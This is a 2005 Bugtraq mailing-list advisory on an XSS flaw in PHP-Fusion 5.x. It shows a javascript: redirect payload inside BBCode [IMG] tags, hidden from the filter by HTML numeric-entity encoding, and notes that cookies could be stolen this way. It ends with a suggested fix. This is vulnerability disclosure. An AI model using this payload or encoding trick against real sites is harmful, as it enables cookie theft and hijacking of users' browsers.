[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    PHP-FUSION 5.* XSS VULNERABILITY
From:       FireSt0rm <firest0rm.uh () gmail ! com>
Date:       2005-03-06 16:58:45
Message-ID: 20050306165845.9938.qmail () www ! securityfocus ! com
[Download RAW message or body]



I found an exploit in the current version of php-fusion which allows you to input XSS \
in the [IMG] tag. I reported it already to php-fusion and they created a fix for \
this. Here it goes:

By converting the text (ie. javascript:alert('test')) to their ascii values, the \
strings between the [img][/img] tags aren't checked by the filter. And this way, you \
can send it and it will be executed.

You can do other things like display cookies, steal cookies, redirections etc.

EXAMPLE:

[IMG]javascript:document.location='http://www.albinoblacksheep.com/flash/you.html'[/IMG]


would be replaced by

[IMG]&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#100&#111&#99&#117&#109&#101& \
#110&#116&#46&#108&#111&#99&#97&#116&#105&#111&#110&#61&#39&#104&#116&#116&#112&#58&#4 \
7&#47&#119&#119&#119&#46&#97&#108&#98&#105&#110&#111&#98&#108&#97&#99&#107&#115&#104&# \
101&#101&#112&#46&#99&#111&#109&#47&#102&#108&#97&#115&#104&#47&#121&#111&#117&#46&#104&#116&#109&#108&#39[/IMG]


FIX:

Filter out characters like '&' and '#'.


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic